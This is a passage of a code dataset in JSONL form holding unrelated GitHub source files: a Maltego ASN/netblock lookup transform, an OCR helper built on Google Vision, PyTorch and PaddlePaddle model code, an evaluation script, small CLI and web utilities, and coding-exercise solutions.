args.outer_tol:\n            print('converged to tolerance.')\n            break\n    #\n    # SAVE OUTPUT\n    #\n    imgio.imsave(args.output,I)\n#==============================================================================\n","repo_name":"nacho-pancho/paco-bcs","sub_path":"code/bcs_spl.py","file_name":"bcs_spl.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"32092083744","text":"from maltego_trx.maltego import UIM_TYPES\nfrom maltego_trx.entities import Netblock, ASNumber, DNS\nfrom tasks.additions_entities import Company\nfrom tasks.MaltegoLampyre import EnterParamsFake, WriteLog, 
WriterResult\nimport tasks.asn_by_ip as module_exec\nfrom maltego_trx.transform import DiscoverableTransform\n\nimport ipaddress\n\ndef get_network(cidr: str):\n try:\n return ipaddress.IPv4Network(cidr)\n except ipaddress.AddressValueError:\n try:\n return ipaddress.IPv6Network(cidr)\n except ipaddress.AddressValueError:\n return None\n except:\n return None\n\nclass EnterParamas_Netblock(EnterParamsFake):\n def __init__(self, ips):\n self.ips = ips\n\n\nclass ASNIPtoBlock(DiscoverableTransform):\n\n @classmethod\n def create_entities(cls, request, response):\n asnnumber = None\n netblock_record = [request.Value]\n try:\n params = EnterParamas_Netblock(netblock_record)\n rows = WriterResult()\n module_exec.IPandASNmapping().execute(params, rows, WriteLog, None)\n\n if len(rows.rows) > 0:\n for row in list(filter(lambda x: len(x['Announced_Prefix']) > 0, rows.rows)):\n _block_result = get_network(row['Announced_Prefix'])\n if _block_result:\n ip1, ip2 = _block_result[0], _block_result[-1]\n _record_str = f\"{ip1}-{ip2}\"\n response.addEntity(Netblock, _record_str)\n label = f\"Country: {row['Country']}\"\n response.entities[-1].setLinkLabel(label)\n\n if len(row['ASN']) > 2:\n asnnumber = row['ASN'][2:]\n response.addEntity(ASNumber, asnnumber)\n label = f\"Country: {row['Country']}\"\n response.entities[-1].setLinkLabel(label)\n\n if len(row['ASN_Name']) > 0:\n\n if row['Country'].strip() != row['ASN_Name']:\n response.addEntity(Company, row['ASN_Name'])\n label = f\"Country: {row['Country']}\"\n response.entities[-1].setLinkLabel(label)\n\n if len(row['Prefix_Description']) > 0:\n response.addEntity(Company, row['Prefix_Description'])\n label = f\"Country: {row['Country']}\"\n response.entities[-1].setLinkLabel(label)\n\n if len(row['rDNS']) > 0:\n if '.' in row['rDNS']:\n\n response.addEntity(DNS, row['rDNS'])\n if asnnumber:\n label = f\"AS: {asnnumber}\"\n response.entities[-1].setLinkLabel(label)\n\n for i in response.entities:\n i.setLinkColor(\"#660066\")\n except Exception as e:\n response.addUIMessage(\"Error: \" + str(e), UIM_TYPES[\"partial\"])\n\n","repo_name":"JohnEskimSmith/Maltego-Examples","sub_path":"UnionProject/transforms/ASNIPtoBlock.py","file_name":"ASNIPtoBlock.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"7415363361","text":"from torchvision.transforms import ToPILImage, PILToTensor\nimport sys\nsys.path.insert(0, \"../\")\nimport properties as properties\nimport utils\nfrom PIL import Image\nfrom io import BytesIO\nimport json\n\n\nimport subprocess\nfrom google.cloud import vision\n\n\nimport torch\nfrom torchvision import io\n\nimport base64\nimport time\n\nimport traceback\n\nVISION_API_ENDPOINT = \"https://vision.googleapis.com/v1/images:annotate\"\n\n\ndef encode_image(image_path):\n with open(image_path, \"rb\") as image_file:\n return base64.b64encode(image_file.read())\n\n\nclass GcloudHelper:\n def __init__(\n self, empty_char=properties.empty_char, is_eval=False, mock_response=False\n ):\n \"\"\"Google Cloud Vision API text revognition class\n\n Args:\n empty_char (str, optional): Empty character mapping. Defaults to properties.empty_char.\n is_eval (bool, optional): Specify if ocr evaluation is being performed. 
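When True, labels are returned as-is, without the charset filtering or length checks applied below. 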
Defaults to False.\n \"\"\"\n print(\"Initializing Gcloud helper\")\n self.empty_char = empty_char\n self.is_eval = is_eval\n self.client = vision.ImageAnnotatorClient()\n self.mock_response = mock_response\n\n self.count_calls = 0\n self.count_exceptions = 0\n print(\"Gcloud helper initialized\")\n\n def get_image_bytes(self, image):\n img = ToPILImage()(image)\n img_buffer = BytesIO()\n img.save(img_buffer, format=\"PNG\") # Store image in memory as a buffer\n return img_buffer.getvalue()\n\n def get_labels(self, imgs):\n \"\"\"Obtain text labls for a batch of images\n\n Args:\n imgs (torch.tensor): Batch of word images\n\n Returns:\n list[str]: List of labels extracted using the OCR\n \"\"\"\n labels = []\n for i in range(imgs.shape[0]):\n img_bytes = self.get_image_bytes(imgs[i])\n start = time.time()\n image = vision.Image(content=img_bytes)\n response = self.client.text_detection(image)\n end = time.time()\n try:\n texts = response.text_annotations\n if len(texts) == 0:\n labels.append(self.empty_char)\n continue\n # At least one text label was extracted\n label = texts[0].description # Multiple detections possible. We always pick first detection,\n if label == \"\":\n label = self.empty_char\n if self.is_eval:\n labels.append(label)\n continue \n label = utils.get_ununicode(label)\n for c in label:\n if c not in properties.char_set:\n label = label.replace(c, \"\")\n if len(label) > properties.max_char_len:\n label = self.empty_char\n labels.append(label)\n except:\n print(traceback.format_exc())\n print(f\"Image Shape - {imgs[i].shape}\")\n print(\"Response\")\n print(response)\n print(\"Exception Raised. Skipping image\")\n print(f\"Request-Response time - {(end - start) * 1000}\")\n labels.append(self.empty_char)\n self.count_exceptions += 1\n if self.count_exceptions > 20:\n print(f\"More than {self.count_exceptions} exceptions. 
Exiting...\") # Limit number of failures\n exit()\n continue\n\n return labels\n\n def get_labels_fullimage(self, image):\n label_bboxes = list()\n h, w = image.shape[-2:]\n img_bytes = self.get_image_bytes(image)\n print(\"Sending request\")\n start = time.time()\n if self.mock_response:\n response = json.load(\n open(\"/home/ganesh/projects/def-nilanjan/ganesh/Gradient-Approx-to-improve-OCR/output.json\"))\n else:\n image = vision.Image(content=img_bytes)\n response = self.client.text_detection(image)\n self.count_calls += 1\n print(\"Response Received\")\n end = time.time()\n print(f\"Time taken - {(end - start) * 1000}\")\n texts = response.text_annotations\n \n # Get all words + bboxes for full document image\n for text_info in texts:\n verts = text_info.bounding_poly.vertices\n bbox = dict()\n bbox[\"label\"] = text_info.description\n getattr(verts[0], \"x\", 0), getattr(verts[0], \"y\", 0)\n bbox[\"x1\"], bbox[\"y1\"] = getattr(verts[0], \"x\", 0), getattr(verts[0], \"y\", 0)\n bbox[\"x2\"], bbox[\"y2\"] = getattr(verts[1], \"x\", w-1), getattr(verts[1], \"y\", 0)\n bbox[\"x3\"], bbox[\"y3\"] = getattr(verts[2], \"x\", w - 1), getattr(verts[2], \"y\", h - 1)\n bbox[\"x4\"], bbox[\"y4\"] = getattr(verts[3], \"x\", 0), getattr(verts[3], \"y\", h - 1)\n label_bboxes.append(bbox)\n return label_bboxes\n\n\nif __name__ == \"__main__\":\n img = Image.open('/home/ganesh/projects/def-nilanjan/ganesh/datasets/1.png').convert(\"L\")\n # img = Image.open(\n # \"/home/ganesh/projects/def-nilanjan/ganesh/datasets/5_Tel_141.png\"\n # ).convert(\"L\")\n # file_name = os.path.abspath()\n # img = io.read_image(file_name, io.ImageReadMode.GRAY)\n img = PILToTensor()(img)\n # img = torch.ones((1, 1, 1), dtype=torch.uint8)\n imgs = torch.cat([img])\n\n obj = GcloudHelper()\n labels = obj.get_labels_fullimage(imgs)\n print(labels)\n","repo_name":"tataganesh/Query-Efficient-Approx-to-improve-OCR","sub_path":"ocr_helper/gcloud_helper.py","file_name":"gcloud_helper.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"18489692410","text":"import transformers\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.nn import CrossEntropyLoss\r\n\r\n\r\nclass PointerBert(nn.Module):\r\n #==========================================================#\r\n # Model that has an extra dot product layer above\r\n # Bert embedding. 
The index of final output tokens of which \r\n # score (the dot product with trained weight vector) is the \r\n # highest is the index of the target.\r\n #==========================================================#\r\n def __init__(self, bertmodel, max_token_len=128):\r\n super().__init__()\r\n self.bert = bertmodel\r\n self.hidden_size = bertmodel.config.hidden_size\r\n self.num_labels = max_token_len\r\n self.dropout = nn.Dropout(bertmodel.config.hidden_dropout_prob)\r\n self.dotproduct = nn.Linear(self.hidden_size, 1, bias=False)\r\n\r\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, labels=None, position_ids=None, head_mask=None, pointer_mask=None):\r\n outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=token_type_ids,\r\n attention_mask=attention_mask, head_mask=head_mask)\r\n \r\n last_hidden_state = outputs[0]\r\n last_hidden_state = self.dropout(last_hidden_state)\r\n\r\n logits = self.dotproduct(last_hidden_state)\r\n logits = torch.reshape(logits, (-1, self.num_labels))\r\n if pointer_mask is not None:\r\n # Tokens other than the special task tokens newly added\r\n # can be ignored. Therefore we make the scores of such tokens\r\n # very small.\r\n logits = logits * pointer_mask - (1-pointer_mask)*torch.finfo(torch.float32).max\r\n\r\n outputs = (logits,) + outputs[2:] \r\n\r\n if labels is not None:\r\n loss_fct = CrossEntropyLoss()\r\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))\r\n outputs = (loss,) + outputs\r\n\r\n return outputs # (loss), logits, (hidden_states), (attentions)\r\n\r\n","repo_name":"Hyungguk/tt-bert","sub_path":"PointerModel.py","file_name":"PointerModel.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41804527658","text":"from typing import List\nimport torch\nimport torch, torchvision\n\n# from models.load_pretrained_models import load_model\nimport matplotlib.pyplot as plt\nimport os\nfrom torchvision import transforms\nfrom torchvision import datasets\nimport time\nimport sys\nimport copy\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nimport torchvision.models as models\nimport numpy as np\nimport torchvision.models as models\nfrom torchinfo import summary\n\n\ndef k_accuracy(\n output: torch.Tensor, target: torch.Tensor, topk=(1,)\n) -> List[torch.FloatTensor]:\n with torch.no_grad():\n # ---- get the topk most likely labels according to your model\n # get the largest k \\in [n_classes] (i.e. the number of most likely probabilities we will use)\n maxk = max(\n topk\n ) # max number labels we will consider in the right choices for out model\n batch_size = target.size(0)\n\n # get top maxk indicies that correspond to the most likely probability scores\n # (note _ means we don't care about the actual top maxk scores just their corresponding indicies/labels)\n _, y_pred = output.topk(k=maxk, dim=1) # _, [B, n_classes] -> [B, maxk]\n y_pred = (\n y_pred.t()\n ) # [B, maxk] -> [maxk, B] Expects input to be <= 2-D tensor and transposes dimensions 0 and 1.\n\n # - get the credit for each example if the models predictions is in maxk values (main crux of code)\n # for any example, the model will get credit if it's prediction matches the ground truth\n # for each example we compare if the model's best prediction matches the truth. 
If yes we get an entry of 1.\n # if the k'th top answer of the model matches the truth we get 1.\n # Note: this for any example in batch we can only ever get 1 match (so we never overestimate accuracy <1)\n target_reshaped = target.view(1, -1).expand_as(\n y_pred\n ) # [B] -> [B, 1] -> [maxk, B]\n target_reshaped = target_reshaped.to(device)\n # compare every topk's model prediction with the ground truth & give credit if any matches the ground truth\n correct = (\n y_pred == target_reshaped\n ) # [maxk, B] were for each example we know which topk prediction matched truth\n # original: correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n # -- get topk accuracy\n list_topk_accs = [] # idx is topk1, topk2, ... etc\n for k in topk:\n # get tensor of which topk answer was right\n ind_which_topk_matched_truth = correct[:k] # [maxk, B] -> [k, B]\n # flatten it to help compute if we got it correct for each example in batch\n flattened_indicator_which_topk_matched_truth = (\n ind_which_topk_matched_truth.reshape(-1).float()\n ) # [k, B] -> [kB]\n # get if we got it right for any of our top k prediction for each example in batch\n tot_correct_topk = flattened_indicator_which_topk_matched_truth.float().sum(\n dim=0, keepdim=True\n ) # [kB] -> [1]\n # compute topk accuracy - the accuracy of the mode's ability to get it right within it's top k guesses/preds\n topk_acc = tot_correct_topk / batch_size # topk accuracy for entire batch\n list_topk_accs.append(topk_acc)\n return list_topk_accs # list of topk accuracies for entire batch [topk1, topk2, ... etc]\n\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nargs = {\"dataset\": sys.argv[1], \"weights\": sys.argv[2]}\nprint(f\"Arguments passed: dataset is {args['dataset']}, weights are {args['weights']}\")\n\ndata_transforms = {\n \"test\": transforms.Compose(\n [\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ]\n )\n}\n\nd_size = args[\"dataset\"]\n\n\ndata_dir = f\"heirarchy_data/{d_size}/wikipaintings_\"\nimage_datasets = {\n x: datasets.ImageFolder(data_dir + x, data_transforms[x]) for x in [\"test\"]\n}\n\ndataloaders = {\n x: torch.utils.data.DataLoader(\n image_datasets[x], batch_size=32, shuffle=True, num_workers=12\n )\n for x in [\"test\"]\n}\ndataset_sizes = {x: len(image_datasets[x]) for x in [\"test\"]}\nclasses = image_datasets[\"test\"].classes\nprint(classes)\n\nmodel = models.resnext101_32x8d(pretrained=True)\nnum_ftrs = model.fc.in_features\nmodel.fc = nn.Linear(num_ftrs, len(classes))\nweights = torch.load(args[\"weights\"], map_location=\"cpu\")\nmodel.load_state_dict(weights)\n\nmodel.eval()\nmodel.to(device)\n\ncorrect_pred = {classname: 0 for classname in classes}\ntotal_pred = {classname: 0 for classname in classes}\ntop_1_acc = 0\ntop_3_acc = 0\ntop_5_acc = 0\nbatch_count = 0\n\n# again no gradients needed\nwith torch.no_grad():\n for data in dataloaders[\"test\"]:\n # batch_count += 1\n images, labels = data\n images = images.to(device)\n outputs = model(images)\n for output, label in zip(outputs, labels):\n # print(output)\n # print(label)\n batch_count += 1\n top_k_accs = k_accuracy(outputs, labels, topk=(1, 3, 5))\n top_1_acc += top_k_accs[0][0]\n top_3_acc += top_k_accs[1][0]\n top_5_acc += top_k_accs[2][0]\n _, predictions = torch.max(outputs, 1)\n # collect the correct predictions for each class\n for label, prediction in zip(labels, predictions):\n if label == prediction:\n 
# credit this class with a hit; total_pred below counts every sample of the class\n                correct_pred[classes[label]] += 1\n            total_pred[classes[label]] += 1\n\n    # for batch in dataloaders[\"test\"]:\n    # image,label = batch\n    # output=model(image)\n    # # print(output)\n\ntotal_correct = 0\npred_tot = 0\nprint(total_pred)\n# print accuracy for each class\nfor classname, correct_count in correct_pred.items():\n    total_correct += correct_count\n    pred_tot += total_pred[classname]\n    accuracy = 100 * float(correct_count) / total_pred[classname]\n    print(f\"Accuracy for class: {classname:5s} is {accuracy:.1f} %\")\n\ntotal_acc = 100 * total_correct / pred_tot\nk_1_acc = 100 * top_1_acc / batch_count\nk_3_acc = 100 * top_3_acc / batch_count\nk_5_acc = 100 * top_5_acc / batch_count\n\nprint(f\"Accuracy is {total_acc:.1f} %\")\n\nprint(f\"Accuracy for top 1: is {k_1_acc:.1f} %\")\nprint(f\"Accuracy for top 3: is {k_3_acc:.1f} %\")\nprint(f\"Accuracy for top 5: is {k_5_acc:.1f} %\")\n","repo_name":"sami-amer/art-style-classification","sub_path":"scripts/top-k-accuracy.py","file_name":"top-k-accuracy.py","file_ext":"py","file_size_in_byte":6477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70485110294","text":"import click\nfrom collections import OrderedDict\nfrom jinja2 import Environment, PackageLoader\nfrom merle.fetched_resource import FetchedResource\nfrom slugify import slugify as string_slugify\n\nDEFAULT_TEMPLATE = 'yaml.jinja2.txt'\nBRIEF_TEMPLATE = 'brief.yaml.jinja2.txt'\n\n\ndef dumper(obj, template_name=DEFAULT_TEMPLATE):\n    env = Environment(loader=PackageLoader('merle', 'templates'),\n                      trim_blocks=True, lstrip_blocks=True)\n    t = env.get_template(template_name)\n    return t.render(f=obj)\n\n@click.group()\ndef cli():\n    pass\n\n@cli.command()\n@click.argument('title')\ndef slugify(title):\n    click.echo(string_slugify(title))\n\n@cli.command()\n@click.argument('url')\n@click.option('--anchor-link', '-a', is_flag=True)\n@click.option('--brief', '-b', is_flag=True)\n@click.option('--tabular', '-t', is_flag=True)\n@click.option('--markdown', '-m', is_flag=True)\n\ndef meta(url, tabular, markdown, anchor_link, brief):\n    o = OrderedDict()\n    f = FetchedResource(url)\n    o['slug'] = f.slug\n    o['url'] = f.returned_url\n    o['title'] = f.title\n    o['description'] = f.description\n    o['fetched_at'] = f.fetched_at\n    o['published_at'] = f.published_at\n    o['authors'] = f.authors\n    o['word_count'] = f.word_count\n    o['excerpt'] = f.excerpt\n\n    if tabular:\n        click.echo(dumper(o), err=True)\n        click.echo('\t'.join(\n            [o['title'], o['url'], o['description'], str(o['word_count'])]\n        ))\n    elif markdown:\n        click.echo(\"\"\"[%s](%s)\"\"\" % (o['title'], o['url']))\n    elif anchor_link:\n        click.echo(\"\"\"<a href=\"%s\">%s</a>\"\"\" % (o['url'], o['title']))\n    elif brief:\n        click.echo(dumper(o, BRIEF_TEMPLATE))\n    else:\n        click.echo(dumper(o))\n\n\n\n\nif __name__ == '__main__':\n    cli()\n","repo_name":"dannguyen/merle","sub_path":"merle/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"74907837332","text":"# Power of Cryptography\n\nimport math\n\n\ndef k(n, p):\n    return round(math.pow(math.e, math.log(p) / n))\n\n\ndef main():\n    while True:\n        try:\n            n = int(input())\n            p = int(input())\n        except EOFError:\n            break\n        else:\n            print(k(n, p))\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"jrmanrique/codingproblems","sub_path":"uvaonlinejudge/python/p113.py","file_name":"p113.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43923467629","text":"from django import template\n# added plotly to INSTALLED_APPS\nimport plotly.graph_objects as go\nregister = template.Library()\n\n@register.simple_tag\ndef plotly(l1,l2):\n    fig = go.Figure(\n        go.Scatter(x=l1, y=l2,\n        #    layout=go.Layout(width=500, height=400)\n   ))\n    fig.update_layout(\n        height=250,\n        margin=dict(l=20,r=20,t=20,b=20)\n    )\n    \n    return fig.to_html()
\n","repo_name":"taijusugahara/Django-","sub_path":"graph/graphApp/templatetags/plotly.py","file_name":"plotly.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22223132787","text":"# -*- coding: utf-8\n\"\"\"Tests for prompt generation.\"\"\"\n\nimport unittest\n\nimport os\n\nfrom IPython.testing import tools as tt, decorators as dec\nfrom IPython.core.prompts import PromptManager, LazyEvaluate\nfrom IPython.testing.globalipapp import get_ipython\nfrom IPython.utils.tempdir import TemporaryWorkingDirectory\nfrom IPython.utils import py3compat\nfrom IPython.utils.py3compat import unicode_type\n\nip = get_ipython()\n\n\nclass PromptTests(unittest.TestCase):\n    def setUp(self):\n        self.pm = PromptManager(shell=ip, config=ip.config)\n    \n    def test_multiline_prompt(self):\n        self.pm.in_template = \"[In]\\n>>>\"\n        self.pm.render('in')\n        self.assertEqual(self.pm.width, 3)\n        self.assertEqual(self.pm.txtwidth, 3)\n        \n        self.pm.in_template = '[In]\\n'\n        self.pm.render('in')\n        self.assertEqual(self.pm.width, 0)\n        self.assertEqual(self.pm.txtwidth, 0)\n    \n    def test_translate_abbreviations(self):\n        def do_translate(template):\n            self.pm.in_template = template\n            return self.pm.templates['in']\n        \n        pairs = [(r'%n>', '{color.number}{count}{color.prompt}>'),\n                 (r'\\T', '{time}'),\n                 (r'\\n', '\\n')\n                 ]\n        \n        tt.check_pairs(do_translate, pairs)\n    \n    def test_user_ns(self):\n        self.pm.color_scheme = 'NoColor'\n        ip.ex(\"foo='bar'\")\n        self.pm.in_template = \"In [{foo}]\"\n        prompt = self.pm.render('in')\n        self.assertEqual(prompt, u'In [bar]')\n\n    def test_builtins(self):\n        self.pm.color_scheme = 'NoColor'\n        self.pm.in_template = \"In [{int}]\"\n        prompt = self.pm.render('in')\n        self.assertEqual(prompt, u\"In [%r]\" % int)\n\n    def test_undefined(self):\n        self.pm.color_scheme = 'NoColor'\n        self.pm.in_template = \"In [{foo_dne}]\"\n        prompt = self.pm.render('in')\n        self.assertEqual(prompt, u\"In []\")\n\n    def test_render(self):\n        self.pm.in_template = r'\\#>'\n        self.assertEqual(self.pm.render('in',color=False), '%d>' % ip.execution_count)\n    \n    @dec.onlyif_unicode_paths\n    def test_render_unicode_cwd(self):\n        with TemporaryWorkingDirectory(u'ünicødé'):\n            self.pm.in_template = r'\\w [\\#]'\n            p = self.pm.render('in', color=False)\n            self.assertEqual(p, u\"%s [%i]\" % (py3compat.getcwd(), ip.execution_count))\n    \n    def test_lazy_eval_unicode(self):\n        u = u'ünicødé'\n        lz = LazyEvaluate(lambda : u)\n        # str(lz) would fail\n        self.assertEqual(unicode_type(lz), u)\n        self.assertEqual(format(lz), u)\n    \n    def test_lazy_eval_nonascii_bytes(self):\n        u = u'ünicødé'\n        b = u.encode('utf8')\n        lz = LazyEvaluate(lambda : b)\n        # unicode(lz) would fail\n        self.assertEqual(str(lz), str(b))\n        self.assertEqual(format(lz), str(b))\n    \n    def test_lazy_eval_float(self):\n        f = 0.503\n        lz = LazyEvaluate(lambda : f)\n        \n        self.assertEqual(str(lz), str(f))\n        self.assertEqual(unicode_type(lz), unicode_type(f))\n        self.assertEqual(format(lz), str(f))\n        self.assertEqual(format(lz, '.1'), '0.5')\n    \n    @dec.skip_win32\n    def test_cwd_x(self):\n        self.pm.in_template = r\"\\X0\"\n        save = py3compat.getcwd()\n        os.chdir(os.path.expanduser('~'))\n        p = self.pm.render('in', color=False)\n        try:\n            self.assertEqual(p, '~')\n        finally:\n            os.chdir(save)\n        
\n","repo_name":"pyparallel/pyparallel","sub_path":"Lib/site-packages/ipython-4.0.0-py3.3.egg/IPython/core/tests/test_prompts.py","file_name":"test_prompts.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":579,"dataset":"github-code","pt":"67"} +{"seq_id":"7209564914","text":"from bayes_opt import BayesianOptimization\nimport numpy as np\nfrom src.run_trials import multiple_trials\n\ndef get_metric_to_max(dict_trial):\n return dict_trial['mean_p_val']\n\ndef run_hp_tuning(run_trial_fun, num_trials, arg_trial_fun,run_configuration):\n \n pbounds = {'diffusion_lambda': (0,1)}\n def black_box_function(diffusion_lambda):\n pair_model_params={'diffusion_lambda':diffusion_lambda, 'diff':True}\n dict_trial = multiple_trials(run_trial_fun, num_trials, pair_model_params,run_configuration,silence=True)\n return get_metric_to_max(dict_trial)\n\n \n optimizer = BayesianOptimization(\n f=black_box_function,\n pbounds=pbounds,\n random_state=4,\n )\n\n optimizer.maximize(\n init_points=5,\n n_iter=4,\n )\n\n return optimizer\n\n","repo_name":"floregol/template","sub_path":"src/hp_optim.py","file_name":"hp_optim.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20784792414","text":"# https://leetcode.cn/problems/remove-element/?envType=study-plan-v2&envId=top-interview-150\n# 27. 移除元素\n\nfrom typing import List\n\n# 从前往后遍历,如果==val,把最后一个元素放到最前面,数组长度减一\n# 时间32ms 击败98.11%, 内存15.67mb,击败42.73%\ndef removeElement(nums: List[int], val: int) -> int:\n i = 0\n while(i < len(nums)):\n if (nums[i] == val):\n if (i < len(nums) - 1):\n nums[i] = nums.pop()\n else:\n nums.pop()\n else:\n i += 1\n print(len(nums), nums)\n return len(nums)\n\n# 在上面的基础上,使用双指针,不做pop删除操作\n# 没有提升\ndef removeElement2(nums: List[int], val: int) -> int:\n i = 0\n j = len(nums) - 1\n while(i <= j):\n if (nums[i] == val):\n if (i < j):\n nums[i] = nums[j]\n j -= 1\n else:\n i += 1\n nums = nums[:j+1]\n print(len(nums), nums)\n return len(nums)\n\nremoveElement2([0,1,2,2,3,0,4,2], 2)\nremoveElement2([3,2,2,3], 3)\nremoveElement2([1], 1)","repo_name":"luoqaq/leetcode","sub_path":"classic150/removeElement.py","file_name":"removeElement.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34123942890","text":"from src.core.lcd_interface import LCD_Interface\nfrom src.web_interface.web_interface import WebApp\nfrom time import sleep\n\n\nclass Message(LCD_Interface):\n \"\"\"\n A class to display messages uploaded over a web page.\n \"\"\"\n def __init__(self, verbosity):\n super().__init__(verbosity)\n self.web_app = WebApp()\n self.web_app.run()\n\n def message_display(self):\n \"\"\"\n Grabs the message from the WebApp class and displays it on LCD.\n \"\"\"\n while True:\n print(\"here\")\n self.message = self.web_app.message\n\n self.write_centered(0, self.message)\n\n sleep(0.5)\n\n\nif __name__ == \"__main__\":\n msg_view = Message(1)\n msg_view.message_display()\n\n# TO-DO: Create seperate thread for hosting webpage!!!!!!","repo_name":"ZRay07/home-lcd-display","sub_path":"src/core/msg_view.py","file_name":"msg_view.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25416840533","text":"import cv2\nimport os.path\nfrom CSVmodule import *\n\n# Целевой год\nyear = 2019\n\n# Название 
 csv file with the most recent year\nfilename = './data_politics_%d.csv' % year\n\n# While csv files exist, keep searching\nwhile os.path.exists(filename):\n    print('Data for \"' + filename + '\" loaded.\n')\n\n    # Read the csv file\n    data = csv_reader(filename)\n\n    # For every row in the file\n    for row in data:\n        if not os.path.exists(row[-1]):\n            print(row)\n\n    # Move on to the next year\n    year -= 1\n    filename = './data_politics_%d.csv' % year\n\n","repo_name":"StarLightOver/DiplomIVT","sub_path":"Курсовой проект 4 Курс 1 Семестр/Web Scraping/tester_rw_CSV.py","file_name":"tester_rw_CSV.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5675993219","text":"import unittest\nimport TumOnc.context as ctx\nimport pandas as pd\n\nclass test_context(unittest.TestCase):\n    def test_ctx3id(self):\n        for c in ctx.ctx3_id:\n            self.assertEqual(ctx.id_ctx3[ctx.ctx3_id[c]],c)\n        self.assertEqual(ctx.ctx3_id['ACG'],3+4*2+16*0)\n\n    def test_ctx5id(self):\n        for c in ctx.ctx5_id:\n            self.assertEqual(ctx.id_ctx5[ctx.ctx5_id[c]],c)\n        self.assertEqual(ctx.ctx5_id['TACGT'],(3+4*2+16*0)*16+1+1*4)\n\n    def test_get_ctx_bins(self):\n        td = pd.DataFrame(['AGCTT','AGCTT','AGCTT','AGCTT',\n                           'AGTGA','AGTGA',\n                           'GCCGG',\n                           'ACCGA','ACCGT','ACCGG','ACCGC'],columns=['ctx5'])\n        td['ctx3'] = td['ctx5'].str[1:4]\n        bins = ctx.get_ctx_bins(td)\n        # print(td)\n        # print(bins)\n        self.assertEqual(bins.loc['AGCTT','c5id'],0)\n        self.assertEqual(bins.loc['AGTGA','c5id'],1)\n        self.assertGreaterEqual(bins.loc['GCCGG','c5id'],2)\n        self.assertLessEqual(bins.loc['GCCGG','c5id'],6)\n        self.assertGreater(bins.loc['GCCGT','c5id'],6)\n        for c1 in 'AGCT':\n            for c2 in 'AGCT':\n                self.assertEqual(bins.loc[c1+'CCG'+c2,'c3id'],0)\n                self.assertEqual(bins.loc[c1+'GCT'+c2,'c3id'],1)\n    \nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"fedxa/TumOnc","sub_path":"test_TumOnc/test_context.py","file_name":"test_context.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16242054836","text":"import math\n\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\n\n\ndef length_to_mask(length, max_len=None, dtype=None):\n    assert len(length.shape) == 1\n\n    if max_len is None:\n        max_len = length.max().astype('int').item()  # using arange to generate mask\n    mask = paddle.arange(max_len, dtype=length.dtype).expand((len(length), max_len)) < length.unsqueeze(1)\n\n    if dtype is None:\n        dtype = length.dtype\n\n    mask = paddle.to_tensor(mask, dtype=dtype)\n    return mask\n\n\nclass Conv1d(nn.Layer):\n    def __init__(\n            self,\n            in_channels,\n            out_channels,\n            kernel_size,\n            stride=1,\n            padding=\"same\",\n            dilation=1,\n            groups=1,\n            bias=True,\n            padding_mode=\"reflect\", ):\n        \"\"\"1-D convolution that applies \"same\" padding before nn.Conv1D.\n\n        Args:\n            in_channels (int): input channel or input data dimensions\n            out_channels (int): output channel or output data dimensions\n            kernel_size (int): kernel size of 1-d convolution\n            stride (int, optional): stride in 1-d convolution. Defaults to 1.\n            padding (str, optional): padding value. Defaults to \"same\".\n            dilation (int, optional): dilation in 1-d convolution. Defaults to 1.\n            groups (int, optional): groups in 1-d convolution. Defaults to 1.\n            bias (bool, optional): bias in 1-d convolution. Defaults to True.\n            padding_mode (str, optional): padding mode. 
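Passed to F.pad when \"same\" padding is applied in forward. 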
